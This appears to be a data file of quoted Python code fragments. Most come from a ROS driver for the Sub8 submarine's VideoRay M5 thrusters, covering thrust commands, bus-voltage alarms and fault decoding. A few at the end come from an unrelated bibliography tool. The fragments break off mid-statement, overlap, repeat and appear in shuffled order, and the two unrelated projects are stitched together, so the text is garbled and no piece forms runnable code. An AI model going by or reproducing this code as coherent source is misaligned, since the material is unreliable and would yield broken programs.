"+ ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status =",
"Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) #",
"**message_keyword_args ) ) # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'],",
"for code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster:",
"return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain",
"Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets",
"= '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout",
"check_alarm_status(self, alarm): # If someone else cleared this alarm, we need to make",
"other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters",
"self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0",
"thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id,",
"sliding window. However add_reading and get_estimate methods are left for when smarter filtering",
"thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if",
"and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough",
"only determined by comms self.deactivated_thrusters = set() # These will not come back",
"message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort,",
"of instructions, one for each thruster If there are any updates to the",
"simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for port_info in",
"ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in",
"ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {} #",
"in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take",
"a named thruster Example names are BLR, FLH, etc. Raises RuntimeError if a",
"to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake",
"thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args )",
"unavailable for thrust allocation ''' # So that thrust is not allocated to",
"ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback",
"track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in",
"thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with",
"message, route that command to the appropriate port/thruster - Send a thruster status",
"node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force",
"class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time def",
"self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg =",
"PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg =",
"self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2)",
"this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name,",
"thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the",
"self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity =",
"that command to the appropriate port/thruster - Send a thruster status message describing",
"call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a dict indexed",
"= rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time",
"AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus",
"def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports =",
"if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity =",
"So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): '''",
"the sub's thrusters - Gather configuration data and make it available to other",
"time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): '''",
"{}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0",
"to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub =",
"node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def",
"thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online",
"can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/'",
"if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before launching",
"self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration",
"Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') +",
"in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def",
"command to the appropriate port/thruster - Send a thruster status message describing the",
"''' Makes a thruster unavailable for thrust allocation ''' # So that thrust",
"srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) )",
"# Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for",
"{} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if",
"ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener",
"(amount of seconds for which to keep a reading in the buffer) '''",
"alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out",
"self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates",
"raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return",
"These alarms require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\")",
"self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in",
"bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s",
"1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self,",
"reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self, srv):",
"import numpy as np import copy import rospy import rospkg import rosparam import",
"if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in",
"are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These",
"# s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout,",
"(' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status",
"So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that",
"UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects",
"failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)",
"objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake =",
"np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name +",
"power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm",
"is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to",
"the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if",
"be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor =",
"severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration",
"bus_voltage < self.kill_voltage: severity = 5 if severity is not None and self.cached_severity",
"== '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\"",
"np import copy import rospy import rospkg import rosparam import threading import argparse",
"in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises",
"self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster ('",
"the severity to the number of failed thrusters (clipped at 5) ''' offline_names",
"not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name",
"to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even",
"voltage. As of May 2017, this is just a simple rolling average with",
"commanded Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero",
"= target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline offline_on_port",
"it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name:",
"than the window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now()",
"name, thrust): ''' Issue a a force command (in Newtons) to a named",
"self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation",
"self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort",
"the 'offline_thruster_names' parameter accordingly Sets the severity to the number of failed thrusters",
"objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id",
"offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline)",
"self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG =",
"rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms",
"thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in",
"if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault',",
"data and make it available to other nodes - Instantiate ThrusterPorts, (Either simulated",
"for communicating with thrusters - Track a thrust_dict, which maps thruster names to",
"= rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary",
") self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration =",
"= thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and",
"min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone",
"'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents}",
"offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters):",
"physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust,",
"__init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the sub's",
"'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v']",
"self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if",
"voltage readings to buffer ''' voltage = float(voltage) # Only add if it",
"description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter,",
"based on parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout:",
"= port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the",
"to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout =",
"to the thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name]",
"firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/'",
"contain a list of instructions, one for each thruster If there are any",
"target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline offline_on_port =",
"5 if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage",
"David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1",
"at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer()",
"None: raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')",
"window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now() - reading.t",
"rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort",
"def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation ''' #",
"= 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings",
"M5's will give nonsense feedback at times) if voltage >= self.VMIN and voltage",
"set() # These will not come back online even if comms are good",
"= { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2):",
"immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters",
"= port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver:",
"'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power",
"@thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons)",
"use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' +",
"B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster '''",
"and get_estimate methods are left for when smarter filtering is needed ''' VMAX",
"list of instructions, one for each thruster If there are any updates to",
"thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class",
"If there are any updates to the list of failed thrusters, it will",
"None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3",
"These messages contain a list of instructions, one for each thruster If there",
"[ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key:",
"power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust,",
"rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of",
"self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters ''' for port",
"rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header,",
"# Feedback on thrusters (thruster mapper blocks until it can use this service)",
"''' voltage = float(voltage) # Only add if it makes sense (the M5's",
"is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come",
"{} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return",
"buffer ''' voltages = [] if len(self.buffer) == 0: return None for r",
"bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5",
"Returns average voltage in buffer ''' voltages = [] if len(self.buffer) == 0:",
"int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code & fault",
"online even if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\")",
"# Necessary for some settings to take effect def get_thruster_info(self, srv): ''' Get",
"comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return",
"has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes",
"of the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that",
"set() # This is only determined by comms self.deactivated_thrusters = set() # These",
"fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has",
"status message describing the status of the particular thruster ''' self.failed_thrusters = set()",
"= target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command",
"offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately",
"port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust",
"from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv",
"not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0",
"thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters '''",
"+ '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id)",
"parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 #",
"threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from",
"(the M5's will give nonsense feedback at times) if voltage >= self.VMIN and",
"list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else:",
"We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of",
"ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service to",
"appropriate port - Given a command message, route that command to the appropriate",
"constant width sliding window. However add_reading and get_estimate methods are left for when",
"= 3 if bus_voltage < self.kill_voltage: severity = 5 if severity is not",
"a command message, route that command to the appropriate port/thruster - Send a",
"self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer",
"thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical",
"0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes",
"self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) #",
"= rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration)",
"'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power =",
"waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout",
"window_duration): ''' window_duration - float (amount of seconds for which to keep a",
"= rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self,",
"communicating with thrusters - Track a thrust_dict, which maps thruster names to the",
"voltage, time): ''' Adds voltage readings to buffer ''' voltage = float(voltage) #",
"out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number",
"on thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service =",
"for reading in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION:",
"if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay",
"buffer ''' voltage = float(voltage) # Only add if it makes sense (the",
"necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true",
"anything if the thruster status is bad if thruster_status is None: return message_contents",
"UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock()",
"self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0)",
"msg): ''' Callback for receiving thrust commands These messages contain a list of",
"5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue",
"service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus,",
"get_estimate methods are left for when smarter filtering is needed ''' VMAX =",
"Given a command message, route that command to the appropriate port/thruster - Send",
"has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def",
"it will raise and alarm ''' failed_before = {x for x in self.failed_thrusters}",
"'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a",
"effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__':",
"if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage:",
"as np import copy import rospy import rospkg import rosparam import threading import",
"BLR, FLH, etc. Raises RuntimeError if a thrust value outside of the configured",
"> thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format(",
"'/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is",
"time)) self.prune_buffer() # check bus voltage if enough time has passed if rospy.Time.now()",
"mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info)",
"deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock)",
"thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count',",
"not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back",
"ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates",
"float (amount of seconds for which to keep a reading in the buffer)",
"# check bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time",
"''' Issue a a force command (in Newtons) to a named thruster Example",
"Gather configuration data and make it available to other nodes - Instantiate ThrusterPorts,",
"self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the",
"def __init__(self, window_duration): ''' window_duration - float (amount of seconds for which to",
"self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a",
"in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed)",
"Prevent outside interference # Create ThrusterPort objects in a dict indexed by port",
"outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if",
"self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a",
"filtering is needed ''' VMAX = 50 # volts VMIN = 0 #",
"get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going",
"Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb,",
"for a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info",
"Add the thrusters to the thruster dict and configure if present for thruster_name",
"real), for communicating with thrusters - Track a thrust_dict, which maps thruster names",
"<< 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 <<",
"in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware",
"in self.thruster_to_port_map.keys()} # These alarms require this service to be available before things",
"true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0):",
"containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver')",
"# This is only determined by comms self.deactivated_thrusters = set() # These will",
"sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import",
"for commanding all of the sub's thrusters - Gather configuration data and make",
"IOError('/thruster_layout rosparam needs to be set before launching the thruster driver') thruster_driver =",
"in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for"
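To make the fault handling in command_thruster concrete, here is the same bitmask decoding as a standalone worked example: a fault word of 20 (binary 10100) has bits 2 and 4 set, which the driver's table maps to OVERCURRENT and STALL.

# Worked example of the fault bitmask decoding used in command_thruster.
fault_codes = {
    (1 << 0): 'UNDERVOLT',
    (1 << 1): 'OVERRVOLT',  # spelling as in the driver's table
    (1 << 2): 'OVERCURRENT',
    (1 << 3): 'OVERTEMP',
    (1 << 4): 'STALL',
    (1 << 5): 'STALL_WARN'
}

fault = 0b10100  # decimal 20: bits 2 and 4 set
faults = [name for code, name in fault_codes.items() if code & fault != 0]
print(faults)  # ['OVERCURRENT', 'STALL'] on Python 3.7+ (dicts preserve insertion order)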
"ordered list) #citation_manager.citekeys = cite_processor.all_citekeys #make the citation definitions for a list of",
"list. To do so need: - the keys for the citations referenced -",
"#second: create CiteRefProcessor object to process cites during src parsing # (and associate",
"= ebnf_sp.cites_rest else: ebnf_dec = ebnf_sp.cites_only_rest if args.xp_parse: ebnf_dec = ebnf_sp.cites_xp # Create",
"the bibliography\"\"\" #first: create a citation manager to handle the bibfile(s) bib4txt_logger.debug('create citation",
"create object to store parsed .bib file bibfile_processor = bibfile.BibFile() bib4txt_logger.debug('Ready to parse",
"result return result+'\\n' # ds added newline 2008-06-27 ################################################################################ def bibfiles2string(bibfile_names): bibfiles_as_strings =",
"dest=\"stylefile\", default=\"default.py\", help=\"Specify user-chosen style file\",metavar=\"FILE\") parser.add_argument(\"-s\", \"--style\", action=\"store\", dest=\"style\", default=\"default\", help=\"Specify user-chosen",
"2.6 dependencies: with :TODO: address the TODOs in the associate BibStuff files, especially",
"exec(str2exec, {}, workaround) style = workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open",
"include this in your reST document with an ``include`` directive. How it works:",
"workaround['style'] #exec(\"import bibstuff.bibstyles.%s as style\"%os.path.splitext(args.stylefile)[0]) \"\"\" # open output file for writing (default:",
